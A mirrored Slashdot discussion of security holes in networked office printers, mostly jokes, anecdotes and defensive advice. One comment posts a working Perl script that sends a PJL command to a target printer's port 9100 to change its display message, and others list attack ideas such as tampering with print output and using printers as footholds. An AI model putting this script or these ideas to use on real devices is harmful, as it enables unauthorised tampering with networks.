Slashdot Mirror
Printers Vulnerable To Security Threats
jcatcw writes "Networked printers are more vulnerable to attack than many organizations realize. Symantec has logged vulnerabilities in five brands of network printers. Printers outside firewalls, for ease of remote printing, may also be open to easy remote code execution. They can be possible launching pads for attacks on the rest of the network. Disabling services that aren't needed and keeping up with patches are first steps to securing them." From the article: "Security experts say that printers are loaded with more complex applications than ever, running every vulnerable service imaginable, with little or no risk management or oversight.... [N]etworked printers need to be treated like servers or workstations for security purposes — not like dumb peripherals."
they run linux!
Of course! This is slashdot!
Over the past several years, if you did a random port scan of the Internet (nmap -iR) the majority of open telnet (tcp port 23) servers were print servers that let you telnet in and change all sorts of settings.
------ Take away the right to say fuck and you take away the right to say fuck the government.
Dwight:
At 8 AM today, someone poisons the coffee. Do NOT drink the coffee. More instructions will follow.
Cordially, Future Dwight.
One of my colleague told me about a printer that started printing page after page of funny characters. It seems there was a virus in the network, trying to write himself on all shares - of which the printer had one.
How much is able one of those printers to do? Printers dedicated to big offices have a pretty powerful processor, lots of RAM, hard drive. Taking control of such a printer could be just as useful for a black-hat cracker as taking control of a computer there, with the bonus that printers aren't usual suspects for infections
...print out pictures of Viagra?
"It does not do to leave a live dragon out of your calculations, if you live near him." - Tolkien
Printers have been network servers for a long time now. I have a 1995 vintage networked laser from Digital Equipment Corporation (rest in pieces) and its manual tells the exact procedure to get to the command line, by using a default password and telnt. Yes, this printer has a unix-like command line interface for configuring its print server functions, and anyone who knows the IP address and the password can get in. Needless to say I've been careful to keep the printer behind my firewall box.
Anyone remember the story about the guy who wrote a "visual basic" virus to send the O RLY owl to all printers in the company?
Maybe we'll see a lot of these coming, it'll be fun *hee hee hee* {devilish laugh}. I don't have a printer }:-]
Syllable 0.62 is here at last!!!
Even worse, such attacks may jam the printers, making it impossible to print out important Dilbert cartoons.
Vincent J. Murphy
Spandex Justice
Was years ago I hacked my employer's printer to say: "Insert Coin" instead of "Ready" and "Feed Me" instead of "Paper tray empty" ... and I know I could have done a lot worse.
Nick Waterman, Sr Tech Director, #include <stddisclaimer>
You don't want to become a victim of printer hacking. A malicious printer hacker could print out sheet music of copyrighted songs, stills from copyrighted movies, or child pornograhpy - leaving you a target of litigaton from the *AA or worse. Not to mention all the juvenile pranks like printing all your valuable company memos in l33t speak.
Protect your printers today!
I wonder when Symantec will release their first security software suite for printers...
Insisting on "correct" English is like saying that there is only one, definitive recipe for chili.
On many if not most college campuses the printers are administered and accounted for my a system tied to a student id. Each student can get so many free prints per semester and can pay per print after exceeding that. Malicious code executing on a print server could sniff all the student accounts accessing the printer.
http://www.vistahelpforum.com/
Windows Vista Help Forum
Laugh if you want, but this was what happened to Iraq on the eve of the Gulf War. A modified printer was put onto their defense computer network by an Allied operative. Right when the air war started, the bug fired up and brought down the network. Just because a threat sounds outlandish does not mean it isn't a real threat.
(The story was recounted in The Generals' War.)
A NYC lawyer blogs. http://www.chuangblog.com/
When I was at University many years ago we used to take advantage of the fact the Windows 95/98 users often didn't restrict access to printers when they connected their machines to the Windows network. We used to add their local printers as network printers on some anoynmous workstation and out print pornographic material on the victim's printer in his apartment at the student home. I know it wasn't exploiting a vulnerability rather than an oversight by the owner of the remote machine, but the results when the victim's girlfriend came over for a visit and found the pictures lying in the printer tray were often amusing. Another gag exploited the fact that Windows 95/98 didn't give you the option to restrict the size of an SMB shared folder and even if it did many people didn't take advantage of it. So in the days of sub gigabyte sized hard drives a mischievously minded person could fill up a Windows workstation's hard drive with crap data by piling it into the shared folder.
An Indian-American Hindu committed to non-violent thought/speech/action alarmed by the global explosion of radical Islam
The big difference is that they're not managed the same by the IT department, which means that they don't get updates, don't have antivirus, etc.
Think back to all of the remote exploits that have come out for MSWindows in the last several years, then take another look at your printers.
Lacking <sarcasm> tags,
I figure it's safer to assume that anything connected to the network could be an attack point. If you have a network toy like some light-up furby that connects to the network and changes color based on packet throughput, that thing probably has no security whatsoever on it (even assuming it has embedded linux or something).
stuff |
Is this the cure for Freudian "printer envy"? It must be terrible when your printer feels vulnerable...
C|N>K
Symantec is really grasping at straws here. In the age of internet security, why anyone would put a printer outside the firewall is too far beyond me to comprehend. Any firewall admin should be able to put rules in place for remote printing. And for that matter, why does any one need to remotely print? Anybody heard of email? Ol' deskjet at home too slow? Users in the office too lazy? Too many pebcak errors? Remote printing may be the most worthless of the worthless network setups. Also, why are people not using external secure computing devices. This stuff is not that expensive for the return it gives.
Symantec is quaking in its boots and instead of shouting fire in a theater they should be looking at what they have and capitalizing on it. Why else would they buy Veritas? I'm sure it wasn't because it they wanted to add AV to it.
Imagine those companies that sell expensive toner and ink cartridges pairing up with someone to write some malicious code to burn through your printing supplies faster.
It won't be long before you hear about something like the "Page_Blackout" or "Toner_Drain" worm.
"Printers worldwide slammed with requests to print the goatse man"
Monstar L
Given my past experience with the high quality of Symantec products we'll be switching to clay tablets and cuneiform.
In the long run, it will be easier and more cost effective.
I find, use and patch somes problems with [ancester of] theses printers from 1998. I have to run some tests for the Y2K projet in that time, and we so much open telnet attack that can be made from printer, we design some specials firewall and network rules at that time.
Ceci n'est pas une Signature !
and this is news to you, please get out of the business.
The Kruger Dunning explains most post on
Isn't this what is called a fax machine?
Unlike, of course, printers behind firewalls, which are not at all open to remote code execution, since there's no chance that anything attached to the firewalled network will ever be hacked. Ah, the magic of the firewall.
- telnetting in
- For a base of operations
- As an aid in information gathering
- Denial of service
- Printing garbage as an annoyance
- Causing apparent hardware failure, distracting service personnel from real attacks
- Damaging the device with invalid NVRAM
- Loss of integrity: modify interpreter to change printing behavior in some mission-sensitive way.
For example, you could display "028*: Radon Discharge Hazard" or some other nonsense trouble symptoms at random intervals on the control panel. The techs in charge would then have to deal with that problem, while you attack their database server or other target. With a modified Postscript interpreter, you could insert random words or even carefully selected phrases in documents as they printed, using the same font that the document prints. How often do people proofread the text of a document they just proofread on screen? Only if they printed it to proofread it, and even then they might not notice. Also, printers in network environments often have file storage space, which makes them a target both to corrupt, if their storage is used in production. If the area is not used in production, it can be used by a rogue to hide things, since typically no one looks at that storage area if it's not in production.sigs, as if you care.
``PC Load Letter? What the fuck does that mean?''
People print sensitive documents to networked printers all the time. You just hang around the printer with your coffee waiting for 'your' job and either clear up the un-collected jobs that are always lying around, or grab stuff as it comes off the printer. The owner will always re-submit the job without a second thought.
Once I was a four stone apology. Now I am two separate gorillas.
... but it's the only place I can install a UT3 server at work and not have the sysadmins find it.
Happy fragging,
-BA
Something similar has already happened I think although not intentionally. Some viruses in their attempt to spread themselves would send a bunch of junk out, and if a printer was on the other side then it would start spewing out garbage. I've also seen nmap scans lock up print servers / printers as well - sometimes with a line or two of stuff printed off.
#!/usr/bin/perl
:-)\n";
#
# Printer Fun
#
use strict;
use IO::Socket;
use Getopt::Std;
my %opt;
my $data;
my $socket;
print "\nPrinter Fun
getopts("r:t:h", \%opt);
usage() if not %opt or $opt{h};
if ($opt{t} and $opt{r}) {
print "[+] Setting the printer ready message\n";
print " " . substr($opt{r}, 0,16) . "\n";
print " " . substr($opt{r}, 16,16) . "\n";
$data = "\033%-12345X" .
"\@PJL RDYMSG DISPLAY=\"" .
"$opt{r}\"\r\n\033%-12345X\r\n";
$socket = IO::Socket::INET->new(
PeerAddr=>$opt{t},
PeerPort=>9100,
Proto =>'tcp')
or die "[-] Couldn't connect to $opt{t}:9100 : $!\n\n";
print $socket $data;
close ($socket);
print "[+] DONE!\n\n";
} else {
print "\n[-] Specify -r and -t!\n\n";
}
sub usage {
print "usage: $0 [-r ] [-t ] [-h]\n";
print "-r : ready message display\n";
print "-t : target\n";
print "-h : help/usage\n";
print "example: $0 -r \"INSERT COIN\" -t 172.16.10.20\n\n";
exit;
Display "PC LOAD LETTER" on the printer. It'll be offline shortly thereafter.
I heard Barbara Boxer supported a bill to install anti security-threat lasers on all printers within 20 years.
The whole reason he went into open source movement is because some printer was running proprietary software that he couldn't fix. At least now anyone can download source code from HP website and modify the way your printer works in any way they want.
Hopefully they'll come out with a patch that will stop printers from printing out pictures of Whoopi Goldberg naked. That happened in our office before. Poor Charles is blind.
Previewing comments are for sissies!
I call SKYNET on this one! I respond to maybe too many network, IT stories this way, but this has to set off warning lights.
Mod parent down, mod first child up.
FX of Phenoelit gave an amazing talk on this at CanSecWest/core03 back in 2003 that outlined how to turn a JetDirect printer into a webserver, fileserver or even a port scanner! We all had a huge chuckle at the thought of someone tracking down a port scanner on the network only to find it was coming from an HP printer.
The entire presentation is still available online in both PDF and PPT format.
The tools used to hack the printers are available here.
Hey Smith.... are you printing something?
No... why do you ask?
Well the printers been printing something for the last ten minutes... let me see...
AUUUUGH! MY EYES!
~lets see some anchor report on this with out bursting into fits of uncontrolable laughter...
i first read this as "Pirates Vulnerable to Security Threats"
Why make printers so "smart" to begin with? Used to be, a man was a man and a printer was a printer. It did what its master told it. The things had just enough internal logic to interpret the voltage differences on the RS232 pins, and maybe a few K of RAM (hah!) to buffer the jobs.
Now they have minds of their own. *Grumble* visions of departmental HP printers that never seemed to be configured properly, always displaying bizarre diagnostic messages
Even a $150 Brother all-in-one machine at the office is screwed up, won't print and says "end of toner life" though a reboot and shake the cartridge convinces it to print for a few pages.
it's = "it is"; its = possessive. E.g., it's flapping its wings.
The main network printer for my workgroup is the copier down the hall. Copiers can increasingly be used for espionage. This is actually nothing new, the CIA had Xerox outfit copiers in the Soviet Embassy with cameras to photograph the documents being copied.
Nowadays, many copiers don't use traditional xerography, but are just fast scanners with printers attached. The network copier/printer down the hall can be used as a document scanner, and even spits out PDFs with searchable text. I don't think it would be too difficult, if one knew the model they were working on, to write a script to send off a PDF of every single document that's scanned, printed, or copied using that machine. In a business with lots of sensitive work, that could be as bad as letting someone rifle through your files after hours.
See the article on Internetsecurityofficer.com/evolution
x .php?blog=1&title=the_next_big_internet_attack&mor e=1&c=1&tb=1&pb=1
http://internetsecurityofficer.com/evolution/inde
I work in the networked printer/multifunction industry. While HP is popular on desktops, other brands are gaining, and rule in the 50ppm+ arena. These devices come from other vendors like Canon, Sharp, Kyocera and Xerox. These multifunction devices provide scan, fax and print services and run a variety of OS's from VxWorks to Solaris. Yes Johnny, that means Windows XP embedded as well. Although I have to say, I haven't seen a DOS based controller in about 6 years.
We routinely receive questions about security, and help patch and configure these boxes to meet network security requirements as closely as possible. Unfortunately, we have limited access to the core OS, so we go as far as we can and workaround the rest. Many vendors, especially those using Windows, provide controller patches with security fixes included. EFI even allows an admin to RDP in and use Windows Update to keep current
These devices aren't perfect, but they have come a long way. That being said, if you haven't heard about this in the past, you have no business being in charge of network security. Multifunction devices today are just as powerful as your desktops and servers, running the same software. Admin control is limited, and vulnerabilities are a reality - note the recent Xerox vulnerability
I would say it is important to stay in contact with your local vendor/dealer to stay on top of these issues. We work with these products everyday, and receive regular notices about security issues and solutions, not to mention a wide variety of other product data. We are a resource, just like any other outside consultant, to help you get and stay secure.
"If there was a Penthouse for nerds, this could be the start of a great story"
Nerds are considered the primary audience. Penthouse IS for nerds, in a very direct way.
Somebody who actually gets laid on occasion is more likely to read Playboy (and the articles, for real).
I just got done working the North American International Auto Show, on one of the video production stages. One of the things we were forced to purchase from Cobo Hall was "Internet Service". Turns out they handed us our own dedicated T1 with 15 public IP addresses. I figured it out once I realized DHCP didn't work and found the paperwork to manually configure IP addresses.
Regardless, they gave us a network Printer/Fax/Copier. Guess what? It had one of the public IP addresses! I guess it was easier when setting up a temporary network to just hand out public IP addresses than it was to purchase a bunch of NAT routers. But there's a perfect example.
Shameless self promotion:s /034.pdf
http://csrc.nist.gov/nissc/2000/proceedings/paper
Penetration Analysis of a XEROX Docucenter DC 230ST:. Assessing the Security of a Multi-purpose Office Machine.
Basically, there were many physical and network vulnerabilities that were of concern without even getting to a remote code execution problem.
Enjoy!
So you're the one who made all of our printers say "PC Load Letter".
WTF does that mean, anyway?
This could go far beyond simple security threats. Most of us have probably seen all the fax spam clogging up paper trays in offices everywhere. Imagine what the spammers could do with a vulnerability like this.
All of the sudden all of your documents are printing out with a new footer on every page. It'd be fscking priceless when the Human Resources girl prints out and distributes to everyone their updated copies of the company's sexual harrassment policy containing an ad asking me if I wanted to enlarge my penis...
"I can be self-referential if I want to," said Tom, swiftly.
If you put ANY device outside a firewall, you deserve to get hacked. It is very simple to secure the device and still allow remote printing - no excuses.
There was a paper published about this years ago. The title of the paper is: Penetration Analysis of a XEROX Docucenter DC 230ST: Assessing the Security of a Multi-purpose Office Machine. link PDF Warning
Reading code is like reading the dictionary - you have to read half of it before you can go back and understand it.
There is code out there for running java based proxy servers on some networked printers, allowing you to gain further access into the network.
The printer thinks it's a router
http://yro.slashdot.org/article.pl?sid=04/11/13/01 5214
DOC Disinformation Obfuscation and Confusion
The carrot to FUD's stick
Many printers offer a postscript engine which, if strictly following postscript's guidelines while ignoring the security pleas, offer places on the internal storage to stash fonts and other things, those of course can be hijacked, and since printers (cough xerox cough) often have crappy inadequate configurations for the OS inside the box, (777 permissions on all files, for example) they allow things like the postscript engine to be used to deliver, replace, and execute remote code without so much as a password.
Clearly, as these vulnerabilities are found, the manufacturer often repairs the oversight with a simple workaround, like chroot jail for the engine or something, but many simply ignore the problem because the people in charge of pushing the units out the door have no care or clue when it comes to security.
... and the one on printers to build houses, imagine coming in to work in the morning and being confronted with a housing estate, only to find your printer had been hacked.
to have every printer behind a dedicated Linux LPRng/CUPS server.
"Nine times out of ten, starting a fire is not the best way to solve the problem." - my wife
Anyone seen this site?
r kprinterhacking
http://www.irongeek.com/i.php?page=security/netwo
It's a great resource for info on network printer hacking and vulnerabilities.
Obviously, these are the honking corporate printers, not your desktop inkjet.
Lacking <sarcasm> tags,
I always wanted to write a PostScript virus that would propagate from printer to printer and whose only other effect would be to replace every instance of the word "strategic" printed to the word "satanic". Never could figure out how to open a network port in PostScript though. You can use network ports in GhostScript but you have to open them with some other language and pass the file handle to GhostScript.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I understand they are MIPS embedded-type deals with specially designed firmware (TCP fingerprinting indicates that at least the network stack isn't derived from any public RT OS sources... so I'm guessing it's an HP original)
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
One brand most people don't think of is minolta (Shameless self plug). The machines can require authentication to gain access (NTLM, AD and other methods) to the control panel and web interface. Most of the copiers run a proprietary operating system along with nonstandard hardware. All of the ports can be turned opened/closed depending on needs, and IP filtering is included as well. Hell, it'll scan to email (which supports authentication) and to a windows share (also uses authentication). SSL certificates, protocol and feature enabling/disabling. For someone to launch an attack from a newer konica minolta copier is next to impossible and any attacks that may get through are due only to a lazy network admin that does not utilize any features of the machine. Granted, these machines do not run windows and are not a hard drive based OS, so they are not susceptable to virii. Some of the controllers we have are made by a third party (EFI) and these run a hard disk OS, but they are generally pretty secure (heavily modified windows). Just my .02 from a copier IT perspective
this is worse than the time a racoon got in the copier
there usually isn't any security (or very little at all)
i worked as a tester for the embedded OS group at a printer maker and you can do almost anything if you know what ports to connect to, etc. pretty fun stuff. they have a funnly functional shell, piping, redirects, and everything.
jason